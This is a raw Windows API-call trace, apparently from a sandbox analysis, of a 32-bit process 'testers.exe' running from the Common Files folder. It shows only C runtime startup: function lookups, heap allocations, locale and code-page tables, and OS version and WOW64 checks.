[0270.187] GetProcAddress (hModule=0x75990000, lpProcName="FlsAlloc") returned 0x759a4f2b [0270.188] GetProcAddress (hModule=0x75990000, lpProcName="FlsFree") returned 0x759a359f [0270.188] GetProcAddress (hModule=0x75990000, lpProcName="FlsGetValue") returned 0x759a1252 [0270.188] GetProcAddress (hModule=0x75990000, lpProcName="FlsSetValue") returned 0x759a4208 [0270.188] GetProcAddress (hModule=0x75990000, lpProcName="InitializeCriticalSectionEx") returned 0x759a4d28 [0270.188] GetProcAddress (hModule=0x75990000, lpProcName="CreateEventExW") returned 0x75a2410b [0270.189] GetProcAddress (hModule=0x75990000, lpProcName="CreateSemaphoreExW") returned 0x75a24195 [0270.189] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadStackGuarantee") returned 0x759ad31f [0270.189] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolTimer") returned 0x759bee7e [0270.189] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolTimer") returned 0x773a441c [0270.189] GetProcAddress (hModule=0x75990000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x773cc50e [0270.189] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolTimer") returned 0x773cc381 [0270.189] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolWait") returned 0x759bf088 [0270.190] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolWait") returned 0x773b05d7 [0270.190] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolWait") returned 0x773cca24 [0270.190] GetProcAddress (hModule=0x75990000, lpProcName="FlushProcessWriteBuffers") returned 0x77380b8c [0270.190] GetProcAddress (hModule=0x75990000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7743fde8 [0270.190] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentProcessorNumber") returned 0x773d1e1d [0270.190] GetProcAddress (hModule=0x75990000, lpProcName="GetLogicalProcessorInformation") returned 0x75a24761 [0270.190] GetProcAddress (hModule=0x75990000, lpProcName="CreateSymbolicLinkW") returned 0x75a1cd11 [0270.191] GetProcAddress (hModule=0x75990000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0270.191] GetProcAddress (hModule=0x75990000, lpProcName="EnumSystemLocalesEx") returned 0x75a2424f [0270.191] GetProcAddress (hModule=0x75990000, lpProcName="CompareStringEx") returned 0x75a246b1 [0270.191] GetProcAddress (hModule=0x75990000, lpProcName="GetDateFormatEx") returned 0x75a36676 [0270.191] GetProcAddress (hModule=0x75990000, lpProcName="GetLocaleInfoEx") returned 0x75a24751 [0270.191] GetProcAddress (hModule=0x75990000, lpProcName="GetTimeFormatEx") returned 0x75a365f1 [0270.191] GetProcAddress (hModule=0x75990000, lpProcName="GetUserDefaultLocaleName") returned 0x75a247c1 [0270.192] GetProcAddress (hModule=0x75990000, lpProcName="IsValidLocaleName") returned 0x75a247e1 [0270.192] GetProcAddress (hModule=0x75990000, lpProcName="LCMapStringEx") returned 0x75a247f1 [0270.192] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentPackageId") returned 0x0 [0270.192] GetProcAddress (hModule=0x75990000, lpProcName="GetTickCount64") returned 0x759beee0 [0270.192] GetProcAddress (hModule=0x75990000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0270.192] GetProcAddress (hModule=0x75990000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0270.193] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x3bc) returned 0xce1f08 [0270.193] GetCurrentThreadId () returned 0x668 [0270.193] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xcd2a08 [0270.194] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x800) returned 0xce22d0 [0270.194] GetStartupInfoW (in: lpStartupInfo=0x8ffbf0 | out: lpStartupInfo=0x8ffbf0*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b9d0d, hStdOutput=0xef9291c7, hStdError=0x0)) [0270.194] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0270.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0270.194] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0270.194] GetCommandLineW () returned="C:\\PROGRA~2\\COMMON~1\\testers.exe" [0270.194] GetEnvironmentStringsW () returned 0xce2ad8* [0270.194] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xaca) returned 0xce35b0 [0270.195] FreeEnvironmentStringsW (penv=0xce2ad8) returned 1 [0270.195] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4a) returned 0xcd2a28 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x98) returned 0xce2ad8 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x3e) returned 0xcd2120 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x6c) returned 0xce2b78 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x6e) returned 0xce2bf0 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x78) returned 0xccf860 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x62) returned 0xce2c68 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x2e) returned 0xcdc588 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x48) returned 0xcd81a0 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x28) returned 0xcdbfe0 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x1a) returned 0xcdfb20 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x4a) returned 0xce2cd8 [0270.195] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x72) returned 0xccf8e0 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x30) returned 0xcdc5c0 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x2e) returned 0xcdc5f8 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x1c) returned 0xcdfb48 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0xd2) returned 0xce2d30 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x7c) returned 0xce2e10 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x36) returned 0xce2e98 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x3a) returned 0xcd2168 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x90) returned 0xce2ed8 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x24) returned 0xcdc010 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x30) returned 0xcdc630 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x36) returned 0xce2f70 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x48) returned 0xcd81f0 [0270.196] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x52) returned 0xce2fb0 [0270.197] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x3c) returned 0xcd21b0 [0270.197] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x82) returned 0xce3010 [0270.197] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x2e) returned 0xcdc668 [0270.197] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x1e) returned 0xcdfb70 [0270.197] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x2c) returned 0xcdc6a0 [0270.197] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x54) returned 0xce40a0 [0270.197] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x52) returned 0xce4100 [0270.198] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x2a) returned 0xcdc6d8 [0270.198] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x3c) returned 0xcd21f8 [0270.198] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x54) returned 0xce4160 [0270.198] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x24) returned 0xcdc040 [0270.198] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x30) returned 0xcdc710 [0270.198] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x8c) returned 0xce30a0 [0270.198] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce35b0 | out: hHeap=0xcc0000) returned 1 [0270.200] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x80) returned 0xce3138 [0270.200] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x8, Size=0x800) returned 0xce31c0 [0270.200] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0270.200] GetLastError () returned 0x0 [0270.200] SetLastError (dwErrCode=0x0) [0270.200] GetLastError () returned 0x0 [0270.200] SetLastError (dwErrCode=0x0) [0270.200] GetLastError () returned 0x0 [0270.200] SetLastError (dwErrCode=0x0) [0270.200] GetACP () returned 0x4e4 [0270.200] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x220) returned 0xce39c8 [0270.201] GetLastError () returned 0x0 [0270.201] SetLastError (dwErrCode=0x0) [0270.201] IsValidCodePage (CodePage=0x4e4) returned 1 [0270.201] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8ffbe4 | out: lpCPInfo=0x8ffbe4) returned 1 [0270.201] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8ff6ac | out: lpCPInfo=0x8ff6ac) returned 1 [0270.201] GetLastError () returned 0x0 [0270.201] SetLastError (dwErrCode=0x0) [0270.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8ffac0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0270.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8ffac0, cbMultiByte=256, lpWideCharStr=0x8ff428, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0270.201] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x8ff6c0 | out: lpCharType=0x8ff6c0) returned 1 [0270.201] GetLastError () returned 0x0 [0270.201] SetLastError (dwErrCode=0x0) [0270.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8ffac0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0270.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8ffac0, cbMultiByte=256, lpWideCharStr=0x8ff3f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0270.202] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0270.202] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x8ff1e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0270.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x8ff9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿW\x96\x92ïüû\x8f", lpUsedDefaultChar=0x0) returned 256 [0270.202] GetLastError () returned 0x0 [0270.202] SetLastError (dwErrCode=0x0) [0270.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8ffac0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0270.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8ffac0, cbMultiByte=256, lpWideCharStr=0x8ff418, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā") returned 256 [0270.202] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0270.202] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x8ff208, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0270.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x8ff8c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿW\x96\x92ïüû\x8f", lpUsedDefaultChar=0x0) returned 256 [0270.204] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0270.204] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0270.204] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.205] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.205] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x3c) returned 0xcd2240 [0270.206] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.206] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3300 [0270.206] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xcd2a80 [0270.206] GetVersionExW (in: lpVersionInformation=0x8ffad8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x8ffad8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0270.206] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd3300 | out: hHeap=0xcc0000) returned 1 [0270.206] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcdfbc0 [0270.206] GetCurrentProcess () returned 0xffffffff [0270.206] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x8ffc28 | out: Wow64Process=0x8ffc28) returned 1 